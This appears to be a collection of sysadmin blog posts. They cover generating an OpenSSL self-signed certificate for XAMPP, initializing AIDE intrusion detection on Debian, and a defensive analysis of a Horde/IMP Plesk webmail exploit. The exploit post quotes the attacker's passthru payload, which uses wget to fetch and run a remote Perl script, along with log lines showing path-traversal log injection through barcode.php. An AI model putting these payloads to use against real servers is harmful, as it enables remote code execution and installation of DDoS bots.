[Wed May 07 14:32:03.746107 2014] [ssl:emerg] [pid 4564:tid 252] SSL Library Error: error:0D07803A:asn1 encoding routines:ASN1_ITEM_EX_D2I:nested asn1 error (Type=RSA)
[Wed May 07 14:32:03.746107 2014] [ssl:emerg] [pid 4564:tid 252] SSL Library Error: error:04093004:rsa routines:OLD_RSA_PRIV_DECODE:RSA lib
[Wed May 07 14:32:03.746107 2014] [ssl:emerg] [pid 4564:tid 252] SSL Library Error: error:0D0680A8:asn1 encoding routines:ASN1_CHECK_TLEN:wrong tag
[Wed May 07 14:32:03.746107 2014] [ssl:emerg] [pid 4564:tid 252] SSL Library Error: error:0D07803A:asn1 encoding routines:ASN1_ITEM_EX_D2I:nested asn1 error (Type=PKCS8_PRIV_KEY_INFO)
AH00016: Configuration Failed

Generating a certificate sign request

You can then use the key to generate a certificate sign request using the following command:

D:\Software\xampp\apache\bin>openssl req -nodes -new -key server.key -out server.csr
Loading 'screen' into random state - done
You are about to be asked to enter information that will be incorporated
into your certificate request.
What you are about to enter is what is called a Distinguished Name or a DN.
There are quite a few fields but you can leave some blank
For some fields there will be a default value,
If you enter '.', the field will be left blank.
Country Name (2 letter code) [AU]:.
State or Province Name (full name) [Some-State]:.
Locality Name (eg, city) []:.
Organization Name (eg, company) [Internet Widgits Pty Ltd]:localhost
Organizational Unit Name (eg, section) []:.
Common Name (e.g. server FQDN or YOUR name) []:localhost
Email Address []:.

Please enter the following 'extra' attributes
to be sent with your certificate request
A challenge password []:mypassword
An optional company name []:.

You should of course use the appropriate data instead of localhost and dot (which means empty field). Also choose a different challenge password than mypassword.

This will create a file called server.csr containing something like:


You probably do not need the -nodes option since it only applies when using openssl to generate a key using the req command. But I’d rather use it here although I do not need it than forget it when generating both the key and the certificate in a single step using the req command.

Generating a certificate

Now we need to generate the certificate using the following:

D:\Software\xampp\apache\bin>openssl x509 -req -days 365 -in server.csr -signkey server.key -out server.crt
Loading 'screen' into random state - done
Signature ok
Getting Private key

If you get such an error:

unable to write 'random state'

it means you forgot to set the second environment variables as shown in the beginning of this post.

Generating a self-signed certificate in one step

When generating a self-signed certificate you can combine this all to one step using only the req command:

D:\Software\xampp\apache\bin>openssl req -nodes -new -x509 -keyout server.key -out server.crt
Loading 'screen' into random state - done
Generating a 1024 bit RSA private key
writing new private key to 'server.key'
You are about to be asked to enter information that will be incorporated
into your certificate request.
What you are about to enter is what is called a Distinguished Name or a DN.
There are quite a few fields but you can leave some blank
For some fields there will be a default value,
If you enter '.', the field will be left blank.
Country Name (2 letter code) [AU]:.
State or Province Name (full name) [Some-State]:.
Locality Name (eg, city) []:.
Organization Name (eg, company) [Internet Widgits Pty Ltd]:localhost
Organizational Unit Name (eg, section) []:.
Common Name (e.g. server FQDN or YOUR name) []:localhost
Email Address []:.

You should of course use the appropriate data instead of localhost and dot (which means empty field).

Installing the certificate

Now we just need to copy the key and the certificate to the apache installation:

D:\Software\xampp\apache\bin>copy /Y server.crt d:\Software\xampp\apache\conf\ssl.crt
        1 file(s) copied.

D:\Software\xampp\apache\bin>copy /Y server.key d:\Software\xampp\apache\conf\ssl.key
        1 file(s) copied.

After a restart of the Apache web server, your new certificate will be available.

Linux: Configure AIDE (Advanced Intrusion Detection Environment)

We upgraded our server to Debian Wheezy and Plesk 11.5 about a week ago and started getting many emails from cron. Luckily I had entered the email address of a colleague as administrator and he got the spam 😉

One of them was this one:

———- Forwarded message ———-
Date: 2013/9/16
Subject: Daily AIDE report for

This is an automated report generated by the Advanced Intrusion Detection
Environment on started at 2013-09-16 07:45:17.

* The cron job was terminated by a fatal error. *

* the cron job was interrupted before AIDE could return an exit code. *
* script errors *
Fatal error: The AIDE database ‘/var/lib/aide/aide.db’ does not exist!
This may mean you haven’t created it, or it may mean that someone has removed it.
End of script errors

AIDE produced no errors.

funny, AIDE did not leave a log.

End of AIDE daily cron job at 2013-09-16 07:45, run time 0 seconds

I didn’t know we had AIDE installed but since it was there, it’d make sense to initialize it properly and see whether it works fine. For those of you who do not know AIDE: it is an intrusion detection software which works by checking file and directory integrity. In order to work, AIDE needs to first have a database it can use to then detect changes.

So the first step is to initialize the database. I found a nice article at HowToForge. It looked pretty easy to I started with the first step which was to download a sample configuration file:


And I got a 404 error:

–2013-09-16 20:32:46–
Resolving (…
Connecting to (||:80… connected.
HTTP request sent, awaiting response… 404 Not Found
2013-09-16 20:32:47 ERROR 404: Not Found.

Well… it starts fine… So I checked in Google whether I could find any alternative location but couldn’t find any. Then I thought that there must be some kind of configuration already available since it was looking for the database at a specific path. So I checked the cron job sending us this nice email:

# grep "aide.conf" /etc/cron.daily/aide
# grep aide configuration data from aide config

Then opened /var/lib/aide/aide.conf.autogenerated to check the content and saw the following:

# this file is generated dynamically from /etc/aide/aide.conf and the files
# in /etc/aide/aide.conf.d
# Any changes you make here will be lost.

aide.conf as well as /etc/aide/aide.conf.d were there and it looks like they were used to generate this file. So I just needed to create the databse. So I just skipped the wget part of the tutorial and went to the next step (Step 2: Initialize the AIDE database):

# nice -19 aide --init --config=/etc/aide/aide.conf

AIDE, version 0.15.1

### AIDE database at /var/lib/aide/ initialized.

It was pretty fast (you wish AIDE was actually that fast to initialize…). Then I checked whether AIDE was working properly:

 nice -19 aide -C --config=/etc/aide/aide.conf
Couldn't open file /var/lib/aide/aide.db for reading

Ok, this one is obvious, it has created a file and is actually looking for aide.db so I just had to rename the file (well, I thought so because the next step of the tutorial was “cp aide.db.out”):

# mv /var/lib/aide/ /var/lib/aide/aide.db
# nice -19 aide -C --config=/etc/aide/aide.conf
Database does not have attr field.
Comparation may be incorrect
Generating attr-field from dbspec
It might be a good Idea to regenerate databases. Sorry.
db_char2line():Error while reading database

OK, so the initialization was actually too fast and it didn’t generate a proper database… So after googling again, I found out you can initialize AIDE with the following:


It then runs forever using a CPU core at about 80% to 100%. It might display a few warnings like:

/run/lock/mailman/ mtime in future
/run/lock/mailman/master-qrunner mtime in future

But I wouldn’t worry about them.

Looking at the running processes, I can see that it actually caused a aide — init to be called but with the auto generated configuration file. Actually I should have thought that it is the one I should use, otherwise all rules are missing…

The initialization of AIDE took over an hour. I then made the second mistake: I immediately run a check, got the same error, assumed that the created database was again not working and restarted an initialization. Only later did I think that the problem was probably that it created a database and I needed to copy it to aide.db otherwise the check would still run with the old database.

After the second initialization and copying the file, I didn’t get the same error again when running the check but a new one:

/usr/bin/aide --config /var/lib/aide/aide.conf.autogenerated -C
File database must have one db_spec specification
File database must have one db_spec specification
File database must have one db_spec specification
File database must have one db_spec specification
File database must have one db_spec specification
File database must have one db_spec specification
File database must have one db_spec specification
File database must have one db_spec specification
File database must have one db_spec specification
File database must have one db_spec specification
File database must have one db_spec specification

The message is not 100% clear (does it mean it expected one and found none or that it expected one and found two ?). I thought it might have something to do with the second initialization. Maybe it did not reset the file but just appended to it… So I deleted both db files and tried again:

rm /var/lib/aide/ /var/lib/aide/aide.db
cp /var/lib/aide/ /var/lib/aide/aide.db
/usr/bin/aide --config /var/lib/aide/aide.conf.autogenerated --checked

It then looked better and I actually got a list of differences. I now need to check the list and also check what I need to add to the exclusion list and other configuration option to try to keep everything secure but avoid unnecessary spamming.

Plesk Exploit: Readable Logfile Vulnerability

A vulnerability scan has been performed on one of our servers at the beginning of the month. This last about 4 days. It was looking for a vulnerable versions of the Plesk control panel to exploit the Horde/IMP Plesk Webmail Exploit. Let’s have a look at how this looks like in a few log files:

First the attacker is checking which version of Horde is installed: - - [01/Jun/2013:15:05:42 +0200] "GET /horde/services/help/?show=about HTTP/1.1" 200 3326 "-" "HTTP_Request2/0.5.2 ( PHP/5.2.11"

If it finds a suitable version of Horde, it will go to the next steps: - - [01/Jun/2013:15:38:39 +0200] "POST /horde/imp/redirect.php HTTP/1.1" 302 - "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20091102 Firefox/3.5.5"

Here, the attacker sends a POST request to /horde/imp/redirect.php including some PHP code as the username. It usually uses the passthru PHP function which executes an external programm. The PHP code usually looks like this:

passthru('cd /tmp;wget http://xxx/yyy.txt;perl yyy.txt;rm -f yyy.txt');

It basically always does the the same:

  1. Go to the tmp directory
  2. Download a PERL script
  3. Execute the script
  4. Delete the script

There are a few variations:

  • The commands are executed using passthru, system, shell_exec or exec
  • The script is downloaded using wget, curl, fetch, GET, lwp-download or lynx
  • The downloaded file is a file with the .txt extension or has an image file extension and is renamed before being executed
  • Sometimes, the attacker also messes with the history so that you do not see what exactly happened

There are even scripts used which will use many of the combinations above just in case some of them do not work on this particular system.

This PHP code is written to the horde log file. It is then executed by using a vulnerability of barcode.php (or rather a vulnerability in Image.php which is called by barcode.php). This looks like this: - - [04/Jun/2013:15:38:41 +0200] " /horde/util/barcode.php?type=../../../../../../../../../../../var/log/psa-horde.log%00 HTTP/1.1" 200 - "1" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20091102 Firefox/3.5.5"

It will most probably also try different log file locations e.g.: - - [04/Jun/2013:15:38:40 +0200] " /horde/util/barcode.php?type=../../../../../../../../../../../var/log/psa-horde/psa-horde.log%00 HTTP/1.1" 200 - "1" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20091102 Firefox/3.5.5"

In many cases, the perl scripts will just install some additional PERL scripts used for DDOS attacks in your /var/www/vhost/xxx/cgi-bin directories. You can find such scripts using:

find /var/www/vhosts/[a-z]*/cgi-bin/*.pl

In order to protect your system, you should always install all Plesk security updates. This vulnerability is very old but seems to be still worth exploiting. There is also a fix for Image.php which can be downloaded here.

Note that the PERL scripts stored in your vhost folders are often well commented and you will find such comments in there:

#part of the Gootkit ddos system

Nice, isn’t it ? 😉